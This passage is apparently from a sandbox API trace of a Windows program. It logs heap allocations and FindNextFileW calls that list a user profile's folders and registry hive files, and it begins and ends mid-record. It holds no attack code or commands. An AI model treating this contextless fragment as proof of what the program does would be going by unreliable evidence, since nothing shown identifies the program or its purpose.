0x3b7b830 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673ef8 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a8a0 | out: hHeap=0x620000) returned 1 [0228.763] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a8a0 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x33b8188 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b898 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d28 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b900 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4c78 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673e90 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b830 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673ef8 | out: hHeap=0x620000) returned 1 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a8a0 | out: hHeap=0x620000) returned 1 [0228.764] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a8a0 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673e90 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673ef8 | out: hHeap=0x620000) returned 1 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a8a0 | out: hHeap=0x620000) returned 1 [0228.764] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0228.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.764] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b968 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3408dc8 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b9d0 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4c78 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4e30 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ba38 [0228.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7baa0 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7bb08 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4e88 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b898 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b18 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d28 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b900 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673e90 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673e90 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b968 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673ef8 | out: hHeap=0x620000) returned 1 [0228.765] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa384f530, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa384f530, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d28 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.765] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b968 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b830 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b968 | out: hHeap=0x620000) returned 1 [0228.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673ef8 | out: hHeap=0x620000) returned 1 [0228.765] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0228.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa34791f0, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xa34791f0, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa34791f0, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0228.766] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3afcdf0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3afcdf0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x3b7a060 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ee0 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4f38 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4f90 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b968 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b900 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b898 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4fe8 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7bb70 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5040 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7bbd8 [0228.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5098 [0228.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b9d0 | out: hHeap=0x620000) returned 1 [0228.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4c78 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba38 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7baa0 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb08 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673e90 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d28 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b18 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3408dc8 | out: hHeap=0x620000) returned 1 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.767] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a8a0 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b830 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7bb08 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a8a0 | out: hHeap=0x620000) returned 1 [0228.767] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d28 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.767] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b830 [0228.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7baa0 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ba38 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7baa0 | out: hHeap=0x620000) returned 1 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.768] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4e88 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.768] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4e30 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.768] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, 